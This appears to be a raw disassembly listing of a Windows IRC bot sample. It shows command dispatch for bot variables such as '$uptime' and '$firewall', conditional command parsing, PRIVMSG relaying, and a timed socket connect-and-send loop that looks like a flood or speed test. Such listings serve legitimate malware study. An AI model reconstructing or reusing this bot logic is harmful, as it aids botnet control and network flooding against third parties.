loc_40C179: ; CODE XREF: sub_40A9CF+179A�j
mov [ebp+var_6404], offset dword_419968
loc_40C183: ; CODE XREF: sub_40A9CF+17A8�j
lea eax, [ebp+var_6388]
push eax
push [ebp+var_6404]
push offset dword_4198A8
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C1A9: ; CODE XREF: sub_40A9CF+1781�j
push [ebp+var_5F84]
call ds:dword_41DF5C ; freeaddrinfo
loc_40C1B5: ; CODE XREF: sub_40A9CF+174F�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_4198D0
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C1D4: ; CODE XREF: sub_40A9CF+171D�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419898
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C37A
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C207
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
cmp eax, 0Ah
ja short loc_40C20C
loc_40C207: ; CODE XREF: sub_40A9CF+1825�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C20C: ; CODE XREF: sub_40A9CF+1836�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_638C], eax
push 4
push offset a2002 ; "2002"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416DEA ; memcmp
add esp, 0Ch
test eax, eax
jnz loc_40C35B
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-9]
mov [ebp+var_6398], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-8]
mov [ebp+var_6397], al
and [ebp+var_6396], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-7]
mov [ebp+var_6395], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-6]
mov [ebp+var_6394], al
and [ebp+var_6393], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-4]
mov [ebp+var_6392], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-3]
mov [ebp+var_6391], al
and [ebp+var_6390], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-2]
mov [ebp+var_638F], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-1]
mov [ebp+var_638E], al
and [ebp+var_638D], 0
lea eax, [ebp+var_638F]
push eax
call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6392]
push eax
call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6395]
push eax
call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6398]
push eax
call sub_40A8AD
pop ecx
push eax
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419860
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 1Ch
jmp short loc_40C375
; ---------------------------------------------------------------------------
loc_40C35B: ; CODE XREF: sub_40A9CF+1866�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419844
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40C375: ; CODE XREF: sub_40A9CF+198A�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C37A: ; CODE XREF: sub_40A9CF+1818�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419838
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C4B0
call sub_416B64 ; clock
mov [ebp+var_639C], eax
and [ebp+var_63A4], 0
and [ebp+var_63A0], 0
push 10h
push 0
lea eax, [ebp+var_63B4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_63B4], 2
loc_40C3C8: ; CODE XREF: sub_40A9CF+1A95�j
call sub_416B64 ; clock
sub eax, [ebp+var_639C]
cmp eax, 3E8h
jnb loc_40C469
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
push eax
call ds:dword_417238 ; ntohs
mov [ebp+var_63B2], ax
push 4
push 0
call sub_4040E8
pop ecx
pop ecx
mov [ebp+var_63B0], eax
push 0
push 2
push 2
call ds:dword_417218 ; socket
mov [ebp+var_63B8], eax
push 10h
lea eax, [ebp+var_63B4]
push eax
push [ebp+var_63B8]
call ds:dword_4171F4 ; connect
push 0
push 1
lea eax, [ebp+var_63A0]
push eax
push [ebp+var_63B8]
call ds:dword_41720C ; send
push [ebp+var_63B8]
call ds:dword_417230 ; closesocket
mov eax, [ebp+var_63A4]
add eax, 2Bh
mov [ebp+var_63A4], eax
jmp loc_40C3C8
; ---------------------------------------------------------------------------
loc_40C469: ; CODE XREF: sub_40A9CF+1A09�j
cmp [ebp+var_63A4], 400h
jbe short loc_40C483
mov eax, [ebp+var_63A4]
mov [ebp+var_6408], eax
jmp short loc_40C48D
; ---------------------------------------------------------------------------
loc_40C483: ; CODE XREF: sub_40A9CF+1AA4�j
mov [ebp+var_6408], 400h
loc_40C48D: ; CODE XREF: sub_40A9CF+1AB2�j
mov eax, [ebp+var_6408]
shr eax, 0Ah
push eax
push offset dword_419820
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C4B0: ; CODE XREF: sub_40A9CF+19BE�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419818
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C4DA
mov eax, [ebp+var_1A8]
sub eax, ds:dword_41980C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C4FF
loc_40C4DA: ; CODE XREF: sub_40A9CF+1AF4�j
push offset dword_41DD08
push 3B7h
push 0
push offset dword_4197E8
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 14h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C4FF: ; CODE XREF: sub_40A9CF+1B09�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4197DC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C53A
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4142BF
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C53A: ; CODE XREF: sub_40A9CF+1B43�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4197D4
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C564
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4197C8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C576
loc_40C564: ; CODE XREF: sub_40A9CF+1B7E�j
lea eax, [ebp+var_1A4]
push eax
call sub_4087C4
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C576: ; CODE XREF: sub_40A9CF+1B93�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4197C0
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C5A0
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4197B4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C5B2
loc_40C5A0: ; CODE XREF: sub_40A9CF+1BBA�j
lea eax, [ebp+var_1A4]
push eax
call sub_408E4A
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C5B2: ; CODE XREF: sub_40A9CF+1BCF�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4197A4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C614
push 1
push offset a9252 ; "9252"
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_63BC], eax
push [ebp+var_63BC]
push offset dword_418B5C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
cmp [ebp+var_63BC], 0
jnz short loc_40C603
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C603: ; CODE XREF: sub_40A9CF+1C2D�j
push [ebp+var_63BC]
call sub_404CBB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C614: ; CODE XREF: sub_40A9CF+1BF6�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419790
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C63B
lea eax, [ebp+var_1A4]
push eax
call sub_4091E2
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C63B: ; CODE XREF: sub_40A9CF+1C58�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419788
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C669
mov eax, [ebp+var_1A8]
sub eax, ds:dword_41977C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C896
loc_40C669: ; CODE XREF: sub_40A9CF+1C7F�j
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C686
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_640C], eax
jmp short loc_40C68D
; ---------------------------------------------------------------------------
loc_40C686: ; CODE XREF: sub_40A9CF+1CA1�j
and [ebp+var_640C], 0
loc_40C68D: ; CODE XREF: sub_40A9CF+1CB5�j
mov eax, [ebp+var_640C]
mov [ebp+var_63C8], eax
call sub_4092A4
mov [ebp+var_63E0], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_63D8], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_63C4], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_63D4], eax
mov eax, [ebp+var_63D8]
cmp eax, [ebp+var_63C8]
jnb short loc_40C715
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C715: ; CODE XREF: sub_40A9CF+1D3F�j
call sub_409318
mov [ebp+var_63C0], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_63CC], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_63DC], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_63D0], eax
cmp [ebp+var_63D0], 1
jnz short loc_40C793
mov [ebp+var_6410], offset byte_41DF00
jmp short loc_40C79D
; ---------------------------------------------------------------------------
loc_40C793: ; CODE XREF: sub_40A9CF+1DB6�j
mov [ebp+var_6410], offset dword_4191F4
loc_40C79D: ; CODE XREF: sub_40A9CF+1DC2�j
cmp [ebp+var_63DC], 1
jnz short loc_40C7B2
mov [ebp+var_6414], offset byte_41DF00
jmp short loc_40C7BC
; ---------------------------------------------------------------------------
loc_40C7B2: ; CODE XREF: sub_40A9CF+1DD5�j
mov [ebp+var_6414], offset dword_4191F4
loc_40C7BC: ; CODE XREF: sub_40A9CF+1DE1�j
cmp [ebp+var_63CC], 1
jnz short loc_40C7D1
mov [ebp+var_6418], offset byte_41DF00
jmp short loc_40C7DB
; ---------------------------------------------------------------------------
loc_40C7D1: ; CODE XREF: sub_40A9CF+1DF4�j
mov [ebp+var_6418], offset dword_4191F4
loc_40C7DB: ; CODE XREF: sub_40A9CF+1E00�j
cmp [ebp+var_63D4], 1
jnz short loc_40C7F0
mov [ebp+var_641C], offset byte_41DF00
jmp short loc_40C7FA
; ---------------------------------------------------------------------------
loc_40C7F0: ; CODE XREF: sub_40A9CF+1E13�j
mov [ebp+var_641C], offset dword_4191F4
loc_40C7FA: ; CODE XREF: sub_40A9CF+1E1F�j
cmp [ebp+var_63C4], 1
jnz short loc_40C80F
mov [ebp+var_6420], offset byte_41DF00
jmp short loc_40C819
; ---------------------------------------------------------------------------
loc_40C80F: ; CODE XREF: sub_40A9CF+1E32�j
mov [ebp+var_6420], offset dword_4191F4
loc_40C819: ; CODE XREF: sub_40A9CF+1E3E�j
cmp [ebp+var_63D8], 1
jnz short loc_40C82E
mov [ebp+var_6424], offset byte_41DF00
jmp short loc_40C838
; ---------------------------------------------------------------------------
loc_40C82E: ; CODE XREF: sub_40A9CF+1E51�j
mov [ebp+var_6424], offset dword_4191F4
loc_40C838: ; CODE XREF: sub_40A9CF+1E5D�j
push [ebp+var_6410]
push [ebp+var_63D0]
push [ebp+var_6414]
push [ebp+var_63DC]
push [ebp+var_6418]
push [ebp+var_63CC]
push [ebp+var_641C]
push [ebp+var_63D4]
push [ebp+var_6420]
push [ebp+var_63C4]
push [ebp+var_6424]
push [ebp+var_63D8]
push offset dword_419708
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 38h
jmp short loc_40C912
; ---------------------------------------------------------------------------
loc_40C896: ; CODE XREF: sub_40A9CF+1C94�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419700
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C912
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C8BD
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jnz short loc_40C8BF
loc_40C8BD: ; CODE XREF: sub_40A9CF+1EE3�j
jmp short loc_40C912
; ---------------------------------------------------------------------------
loc_40C8BF: ; CODE XREF: sub_40A9CF+1EEC�j
push 2
push offset aId ; "id"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40C8EA
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
push offset byte_41EF98
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40C8EA: ; CODE XREF: sub_40A9CF+1F07�j
push offset aUsername ; "username"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C912
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
push offset byte_41F118
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40C912: ; CODE XREF: sub_40A9CF+85�j
; sub_40A9CF+D8�j ...
pop edi
pop esi
leave
retn
sub_40A9CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C916 proc near ; CODE XREF: sub_40CA29+47F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
loc_40C919: ; CODE XREF: sub_40C916+1F�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_40C937
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C937
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
jmp short loc_40C919
; ---------------------------------------------------------------------------
loc_40C937: ; CODE XREF: sub_40C916+C�j
; sub_40C916+16�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_40C916 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C93C proc near ; DATA XREF: sub_40CEB0+66�o
var_534 = dword ptr -534h
var_530 = byte ptr -530h
var_38F = byte ptr -38Fh
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 534h
push 327h
push [ebp+arg_0]
lea eax, [ebp+var_534]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_208]
push eax
push offset asc_419F48 ; ";"
lea eax, [ebp+var_530]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_204], eax
and [ebp+var_20C], 0
loc_40C98D: ; CODE XREF: sub_40C93C+D6�j
cmp [ebp+var_204], 0
jnz short loc_40C998
jmp short loc_40CA17
; ---------------------------------------------------------------------------
loc_40C998: ; CODE XREF: sub_40C93C+58�j
; sub_40C93C+79�j
mov eax, [ebp+var_204]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40C9A8
jmp short loc_40C9B7
; ---------------------------------------------------------------------------
loc_40C9A8: ; CODE XREF: sub_40C93C+68�j
mov eax, [ebp+var_204]
inc eax
mov [ebp+var_204], eax
jmp short loc_40C998
; ---------------------------------------------------------------------------
loc_40C9B7: ; CODE XREF: sub_40C93C+6A�j
push [ebp+var_204]
lea eax, [ebp+var_38F]
push eax
push offset aLinkLink@linkP ; "link!link@link PRIVMSG %s :%s"
push 200h
lea eax, [ebp+var_200]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_200]
push eax
call sub_40E618
pop ecx
lea eax, [ebp+var_208]
push eax
push offset asc_419F48 ; ";"
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_20C], eax
mov eax, [ebp+var_20C]
mov [ebp+var_204], eax
jmp loc_40C98D
; ---------------------------------------------------------------------------
loc_40CA17: ; CODE XREF: sub_40C93C+5A�j
push [ebp+var_534]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_40C93C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA29 proc near ; CODE XREF: sub_40CEB0+8�p
var_1EC = dword ptr -1ECh
var_1E8 = byte ptr -1E8h
var_1C8 = byte ptr -1C8h
var_1A8 = dword ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = byte ptr -1A0h
var_190 = byte ptr -190h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1ECh
cmp [ebp+arg_0], 0
jz short loc_40CA43
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 28h
jz short loc_40CA4A
loc_40CA43: ; CODE XREF: sub_40CA29+D�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CA4A: ; CODE XREF: sub_40CA29+18�j
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
push offset asc_419FB0 ; ")"
push [ebp+arg_0]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_40CA70
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CA70: ; CODE XREF: sub_40CA29+3E�j
mov eax, [ebp+var_10]
sub eax, [ebp+arg_0]
inc eax
cmp eax, 180h
jbe short loc_40CA8A
mov [ebp+var_1EC], 180h
jmp short loc_40CA97
; ---------------------------------------------------------------------------
loc_40CA8A: ; CODE XREF: sub_40CA29+53�j
mov eax, [ebp+var_10]
sub eax, [ebp+arg_0]
inc eax
mov [ebp+var_1EC], eax
loc_40CA97: ; CODE XREF: sub_40CA29+5F�j
push [ebp+var_1EC]
push [ebp+arg_0]
lea eax, [ebp+var_190]
push eax
call sub_407A56
add esp, 0Ch
push 1
push 1
lea eax, [ebp+var_190]
push eax
call sub_407C2C
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
push offset asc_419FAC ; "&&"
lea eax, [ebp+var_190]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_4], eax
and [ebp+var_C], 0
loc_40CAE1: ; CODE XREF: sub_40CA29+475�j
cmp [ebp+var_4], 0
jnz short loc_40CAEC
jmp loc_40CEA3
; ---------------------------------------------------------------------------
loc_40CAEC: ; CODE XREF: sub_40CA29+BC�j
; sub_40CA29+D7�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40CAF9
jmp short loc_40CB02
; ---------------------------------------------------------------------------
loc_40CAF9: ; CODE XREF: sub_40CA29+CC�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
jmp short loc_40CAEC
; ---------------------------------------------------------------------------
loc_40CB02: ; CODE XREF: sub_40CA29+CE�j
lea eax, [ebp+var_1E8]
push eax
lea eax, [ebp+var_1A0]
push eax
lea eax, [ebp+var_1C8]
push eax
push offset a32s16s32s ; "%32s %16s %32s"
push [ebp+var_4]
call sub_416BA2 ; sscanf
add esp, 14h
cmp eax, 3
jz short loc_40CB33
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CB33: ; CODE XREF: sub_40CA29+101�j
lea eax, [ebp+var_1C8]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1A4], eax
lea eax, [ebp+var_1E8]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1A8], eax
cmp [ebp+var_1A4], 0
jnz loc_40CC6E
push offset dword_418F50
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jz loc_40CC6E
push offset aUptime ; "$uptime"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBB1
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_1A4], eax
jmp loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBB1: ; CODE XREF: sub_40CA29+16D�j
push offset aVersion ; "$version"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBD7
mov [ebp+var_1A4], 3B7h
jmp loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBD7: ; CODE XREF: sub_40CA29+19D�j
push offset aFree ; "$free"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBFB
call sub_408E8E
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBFB: ; CODE XREF: sub_40CA29+1C3�j
push offset aLatency ; "$latency"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC1F
call sub_408887
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC1F: ; CODE XREF: sub_40CA29+1E7�j
push offset aFirewall ; "$firewall"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC43
call sub_404279
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC43: ; CODE XREF: sub_40CA29+20B�j
push offset aIpv6 ; "$ipv6"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC67
call sub_4043E9
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC67: ; CODE XREF: sub_40CA29+22F�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CC6E: ; CODE XREF: sub_40CA29+137�j
; sub_40CA29+152�j ...
cmp [ebp+var_1A8], 0
jnz loc_40CD83
push offset dword_418F50
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jz loc_40CD83
push offset aUptime ; "$uptime"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CCC6
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_1A8], eax
jmp loc_40CD83
; ---------------------------------------------------------------------------
loc_40CCC6: ; CODE XREF: sub_40CA29+282�j
push offset aVersion ; "$version"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CCEC
mov [ebp+var_1A8], 3B7h
jmp loc_40CD83
; ---------------------------------------------------------------------------
loc_40CCEC: ; CODE XREF: sub_40CA29+2B2�j
push offset aFree ; "$free"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD10
call sub_408E8E
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD10: ; CODE XREF: sub_40CA29+2D8�j
push offset aLatency ; "$latency"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD34
call sub_408887
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD34: ; CODE XREF: sub_40CA29+2FC�j
push offset aFirewall ; "$firewall"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD58
call sub_404279
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD58: ; CODE XREF: sub_40CA29+320�j
push offset aIpv6 ; "$ipv6"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD7C
call sub_4043E9
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD7C: ; CODE XREF: sub_40CA29+344�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CD83: ; CODE XREF: sub_40CA29+24C�j
; sub_40CA29+267�j ...
push offset asc_419F5C ; "=="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CDAF
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jz short loc_40CDAF
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CDAF: ; CODE XREF: sub_40CA29+36F�j
; sub_40CA29+37D�j
push offset asc_419F58 ; "!="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CDDB
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jnz short loc_40CDDB
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CDDB: ; CODE XREF: sub_40CA29+39B�j
; sub_40CA29+3A9�j
push offset asc_419F54 ; ">"
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE07
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
ja short loc_40CE07
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE07: ; CODE XREF: sub_40CA29+3C7�j
; sub_40CA29+3D5�j
push offset asc_419F50 ; ">="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE30
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jnb short loc_40CE30
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE30: ; CODE XREF: sub_40CA29+3F3�j
; sub_40CA29+401�j
push offset dword_419968
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE59
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jb short loc_40CE59
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE59: ; CODE XREF: sub_40CA29+41C�j
; sub_40CA29+42A�j
push offset asc_419F4C ; "<="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE82
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jbe short loc_40CE82
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE82: ; CODE XREF: sub_40CA29+445�j
; sub_40CA29+453�j
lea eax, [ebp+var_8]
push eax
push offset asc_419FAC ; "&&"
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
jmp loc_40CAE1
; ---------------------------------------------------------------------------
loc_40CEA3: ; CODE XREF: sub_40CA29+BE�j
mov eax, [ebp+var_10]
inc eax
push eax
call sub_40C916
pop ecx
locret_40CEAE: ; CODE XREF: sub_40CA29+1C�j
; sub_40CA29+42�j ...
leave
retn
sub_40CA29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CEB0 proc near ; CODE XREF: sub_40A9CF+14CE�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_4]
call sub_40CA29
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40CEC9
jmp short locret_40CF23
; ---------------------------------------------------------------------------
